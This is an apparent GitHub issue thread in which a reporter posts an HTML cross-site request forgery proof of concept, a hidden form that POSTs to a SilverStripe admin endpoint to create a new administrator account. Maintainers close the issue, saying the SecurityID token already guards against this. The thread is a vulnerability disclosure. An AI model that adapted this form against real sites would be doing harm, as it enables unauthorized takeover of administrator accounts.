search

silverstripe-archive / silverstripe-mobile

Mobile support module for SilverStripe CMS
http://silverstripe.org/mobile/
BSD 3-Clause "New" or "Revised" License
36 stars 36 forks source link

There is a CSRF vulnerability that can add the administrator account #60

Closed AutismJH closed 6 years ago

AutismJH commented 6 years ago

After the administrator logged in, open the following page to add an administrator.

POC:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.silverstripe.org/admin/security/EditForm/field/Members/item/new/ItemEditForm/" method="POST">
      <input type="hidden" name="FirstName" value="22222" />
      <input type="hidden" name="Surname" value="22222" />
      <input type="hidden" name="Email" value="22222&#64;qq&#46;com" />
      <input type="hidden" name="Password&#91;&#95;Password&#93;" value="22222" />
      <input type="hidden" name="Password&#91;&#95;ConfirmPassword&#93;" value="22222" />
      <input type="hidden" name="Locale" value="zh&#95;CN" />
      <input type="hidden" name="FailedLoginCount" value="22222" />
      <input type="hidden" name="DirectGroups&#91;&#93;" value="1" />
      <input type="hidden" name="SecurityID" value="880be6fd0e7bce8afccbb28967034251f607808c" />
      <input type="hidden" name="action&#95;doSave" value="1" />
      <input type="hidden" name="BackURL" value="https&#58;&#47;&#47;demo&#46;silverstripe&#46;org&#47;admin&#47;security&#47;EditForm&#47;field&#47;Members&#47;item&#47;new" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
AutismJH commented 6 years ago

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts.[2] There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests, for example, can all work without the user's interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

AutismJH commented 6 years ago

CSRF commonly has the following characteristics:

It involves sites that rely on a user's identity. It exploits the site's trust in that identity. It tricks the user's browser into sending HTTP requests to a target site. It involves HTTP requests that have side effects.

wilr commented 6 years ago

Closing this as it doesn't relate to the mobile module, CSRF is protected by the above mentioned SecurityID token. In the future, please use security@silverstripe.org to disclose any potential security issues.

robbieaverill commented 6 years ago

If this represents a security issue related to the SilverStripe CMS, please email the details to security@silverstripe.org rather than reporting it on GitHub.